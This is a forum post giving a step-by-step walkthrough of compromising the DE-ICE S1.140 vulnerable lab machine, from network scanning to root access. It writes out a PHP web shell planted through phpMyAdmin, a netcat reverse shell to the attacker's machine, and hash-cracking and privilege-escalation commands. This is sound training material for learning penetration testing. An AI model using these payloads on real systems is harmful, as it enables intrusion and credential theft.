Post Mon Jan 06, 2014 9:16 am

DE-ICE S1.140 Walkthrough

Below is a quick walkthrough on how I solved the DE-ICE S1.140 vulnerable machine that can be downloaded here.

Many thanks to Michael N. and Patrick B for putting this together, it really was fairly close to a real-world scenario.

Tools required

To solve this challenge you will need the following:
1. Kali Linux (Other another suitable platform)
2. A copy of the darkc0de.lst wordlist, which can be downloaded from http://www.filecrop.com/darkc0de.lst.html

Scenario
You have been employed by 'LazyAdmin Corp' to Pen Test their network. You have gained a footing in the organisation and now you're looking to extract some sensitive information. You've determined that this information is held on one of their servers, and now you're attempting to break into that server to extract it





Step 1 - Finding the Machine

When first fired up, the DE-ICE S1.140 machine aquires an IP address via DHCP. So the first step is finding it. My network automatically leased addresses in the 10.20.30.0/24 range out to clients, so I know it's on that network somewhere.

  Code:
nmap -n -sn 10.20.30.0/24


Image

It appears as though 10.20.30.3 looks like its the one I want (I already know what the other machines are)





Step 2 - Port and Service Scanning

Ok next step is to find out which ports are open on the machine, and hopefully which services are listening on those ports. Time to fire up the trusty nmap

  Code:
nmap -sS -n -A -p- 10.20.30.3


Image

Nmap tells me the following ports are open:


21/tcp - FTP - Anonymous logins allowed
22/tcp - SSH
80/tcp - http Webserver
443/tcp - https Webserver
993/tcp - POP3S
995/tcp - IMAPS


Ok, so it looks like there is FTP, SSH, a Webserver, and a mailserver running.





Step 3 - Exploring FTP

As anonymous FTP access is allowed, that will be the first port of call. A quick poke around shows us that there is a folder called 'incoming', but that only members of the ftp group have read access into it. A quick file upload shows that we can write into the folder, but read nothing from it. We'll come back to this later on.

Image



Step 4 - Exploring the HTTP Webserver

Firing up a browser and pointing it to the IP address of the DE-ICE S1.140 machine gives us a HTML page which explains what we have to do.

Image

Seeing a HTML page usually smacks of something else being hosted on the webserver, so lets fire up dirBuster and have a look.

Image

dirBuster tells us that there is a forum being hosted on the webserver as well.

Image

  Code:
http://10.20.30.3/forum/


A quick look around the forum shows the following things

1. There are four users of the forum (admin, mbrown, rhedley, swillard)
2. The SWillard user used to be called SRaines
3. There is a large post entitled "Login Attacks" by MBrown that looks like it's a SSH log dump

Image
Image


Lets take a closer look at that SSH log file. It looks like someone was attempting to brute force their way onto one of the Lazy Admin Corp servers, trying various usernames and passwords, all of them failing. If we look closer though we can see that one of the login attempts succeeded.

Image

The mbrown user successfully logged into this machine from the IP address of 10.0.0.23. If we search for all logins to this machine from this IP address we turn up another entry in the log, !DFiuoTkbxtdk0!, one that looks suspiciously like a password.

Image

It looks like MBrown made the common mistake of typing their password into the username field, and then immediately attempted to login again with the correct details.

Before we go exploring anymore, lets have a look at the HTTPS service





Step 5 - Exploring the HTTPS Webserver

Time to fire up the trusty dirBuster again, this time against the HTTPS port. dirbuster tells us that there are another two services available, webmail and phpmyadmin.

Image





Step 6 - Using MBrown's credentials

First place to try the MBrown's credentials is the forum. They work, allowing us to login. We don't appear to have the rights to do anything here (such as upload files), however we can get into our own profile, which gives us the following information:

1. The user's full name is Mark Brown
2. The user's email address is mb@lazyadmin.corp

Image

The second place to try MBrown's credentials is the webmail service. We log in here with the same password as the forum, but with the email address of mb@lazyadmin.corp as our username.

Image

Success! This lands us two emails. The first of which is an email from Sandy Willard, who has the email address of sw@lazyadmin.corp, telling Mark Brown that he appears to be reusing credentials in multiple locations (Yep, she's right).

Image

The second email gives us the root login credentials for a My-SQL server.
  Code:
Username: root
Password: S4!y.dk)j/_d1pKtX1


Image





Step 7 - Logging into phpMyAdmin

We can now log into the phpMyAdmin site using the credentials in MBrown's email.

Image

This contains the database for the webmails and forum. The following tables contain password hashes for each of the services

Image

Forum:
  Code:
forum/mlf2_userdata


  Code:
SELECT user_name,user_real_name,user_pw FROM forum.mlf2_userdata


Webmail:
  Code:
mail/mailbox


  Code:
SELECT username,password,name,maildir FROM mail.mailbox


We'll record these for cracking later.





Step 8 - Getting a shell on the box

Now we have phpMyAdmin access, we can get a shell on the box, but first we need to find a directory that we can write to, and also access from the website.

As the webserver is running the mylittleforum software, this is a good place to start our hunt. A quick google turns up a possible location in our very first link.

https://www.google.com/search?q=mylittleforum+writable

"...the write permission of the subdirectory templates_c (CHMOD 770, 775 or 777) might need to be changed in order that they are writable"

Can we access this directory from the webserver? Yes we can!

Image

  Code:
http://10.20.30.3/forum/templates_c/


From the phpMyAdmin page, lets create a table to hold our shell

  Code:
CREATE TABLE `test`.`phpshell` (`track1` VARCHAR( 1000 ) NOT NULL ) ENGINE = MYISAM;


Now lets create a quick shell to go in that table

  Code:
insert into phpshell values
("
<?php
if(isset($_REQUEST['cmd'])){
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        die;
}
?>
");


We now have to guess where the forum is actually hosted on the server. Chances are its in the default location of /var/www/ so lets try that first.

  Code:
select * into dumpfile '/var/www/forum/templates_c/phpbackdoor.php' from phpshell


If everything has gone well, we should be able to call the phpshell with the following URL
  Code:
http://10.20.30.3/forum/templates_c/phpbackdoor.php?cmd=whoami


Image

Well the good news is that our php code has been uploaded, but the bad news is that the webserver is running as the low level apache user.

Time to get a real shell on the machine. First we create a named pipe to send data in and out of

  Code:
http://10.20.30.3/forum/templates_c/phpbackdoor.php?cmd=mknod /var/www/forum/templates_c/backpipe p


Next we setup a netcat listener on our local Kali machine

  Code:
nc -l -p 444


And finally we setup a reverse connection from our DE-ICE machine to our Kali machine

  Code:
http://10.20.30.3/forum/templates_c/phpbackdoor.php?cmd=/bin/sh -c "/bin/bash 0</var/www/forum/templates_c/backpipe | nc 10.20.30.5 444 1>/var/www/forum/templates_c/backpipe"


Image

Success! We now have a very limited shell on our DE-ICE machine. We can now spawn a slightly better shell which will allow us to migate to other users

  Code:
python -c 'import pty;pty.spawn("/bin/bash")'






Step 9 - Cracking the hashes

We've now got a low-level privileged user on the machine, but we need access to a higher privilege one. Time to crack the hashes we obtained earlier from the forum and the webmail in the MySQL database.

First up is the webmail hashes. These look like just MD5 hashes, so lets put them in the following format and let John The Ripper have a crack at them with the darkc0de wordlist.

  Code:
Username:Hash

  Code:
john --format=raw-md5 --wordlist=darkc0de.lst webmailhashes


Note - when you want john to display the results of cracking these hashes, you need to specify the --format=raw-md5 as well, otherwise they won't display

Image

Success! We learn the following passwords:


    RHedley - tum-ti-tum
    SWillard - Austin-Willard


Time for the forum hashes. John the Ripper doesn't have a clue what format these are in, and Google doesn't help much either. The hashes must be stored in a strange format. Luckily, the forum software is open source, so we can find out how they generate the hashes.

A bit of searching around shows us that the password functions are stored in the 'functions.inc.php' file within the software.
http://sourceforge.net/p/mylittleforum/code/ci/master/tree/includes/functions.inc.php

Specifically we can reverse engineer the 'is_pw_correct' function to find out what happens when a user enters their password. The code of this function is below:

  Code:
function is_pw_correct($pw,$hash)
{
if(strlen($hash)==50) // salted sha1 hash with salt
{
$salted_hash = substr($hash,0,40);
$salt = substr($hash,40,10);
if(sha1($pw.$salt)==$salted_hash) return true;
else return false;
}
elseif(strlen($hash)==32) // md5 hash generated in an older version
{
if($hash == md5($pw)) return true;
else return false;
}
else return false;
}


Our password hashes are 50 characters in length, so they're Salted SHA1 hashes. The salt forms the last 10 characters of the hash, and the password hash itself is the first 40 characters.

Lets modify the create a file with the hashes in the following format:

  Code:
<HASH>:<SALT>


John the Ripper still can't deal with these types of hashes, but the hashcat tool can

  Code:
hashcat -m 110 forum_passwords darkc0de.lst


Image

Success! We've obtained another password, although it's one we've already got, it shows that users are using the same password for multiple services.

    RHedley - tum-ti-tum


Time to try out these passwords directly on the shell we have on the DE-ICE machine





Step 10 - Obtaining the FTP Backup and Backup Script

Using the passwords we've cracked, lets try to escalate our privileges on the DE-ICE system. The SWillard password (Austin-Willard) doesn't appear to have been reused (well done Sandy) but the RHedley one (tum-ti-tum) does.

  Code:
su - rhedley


Looking around the filesystem we find out that we can now get read access into the /home/ftp/incoming folder, as rhedley is a member of the ftpadmin group. In here we find a file that looks like a encrypted backup of the host. Lets move this to our Kali machine for later on, via the templates_c folder we were using earlier.

Image

  Code:
cp /home/ftp/incoming/backup_webhost_130111.tar.gz.enc /var/www/forum/templates_c/backup_webhost_130111.tar.gz.enc && chmod 666 /var/www/forum/templates_c/backup_webhost_130111.tar.gz.enc


We also find a file called "backup.sh" in the /opt/ directory. This is protected by extended ACLs so normal users cannot read it, but the members of the ftpadmin group have special read permissions. This can be verified with the following command:

  Code:
getfacl /opt/backup.sh


This file contains the encryption type and password used for encrypting the FTP backup.

Using these two files we can unencrypt the backup file on our Kali machine

  Code:
openssl aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -d -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs


Now we have an unencrypted archive, it's just a matter of decompressing the file.

  Code:
tar -zxvf backup_webhost_130111.tar.gz






Step 11 - Cracking the Shadow file

Looking around inside the backup, there are two files that jump out, the passwd file and the shadow file.

Image

Time to put John the Ripper to use again to see if we can pull out any more interesting passwords

  Code:
unshadow webhost/etc/passwd webhost/etc/shadow > unshadowed

  Code:
john --wordlist=darkc0de.lst unshadowed --format=sha512crypt


Image

Aha! We have the password for the sraines user of brillantissimo

But who is the sraines user? They don't exist on the DE-ICE system. Remember back when we first started though - someone mentioned in the forums that they got married and changed their last name from raines to willard....





Step 12 - Stealing the Secrets

First step is finding out what permissions SWillard has over the DE-ICE machine

Image

  Code:
sudo -l


It seems as though SWillard has the ability to run anything they like, so lets get some root privileges.

  Code:
sudo su -


Now we're the root user, time to have a look around. The typical place to store information you want only root to have access to is in the /root/ directory, so lets have a look there first.

Image

We find a file called secret.jpg...which looks very suspicious. If we open it up....?

Cake!

Image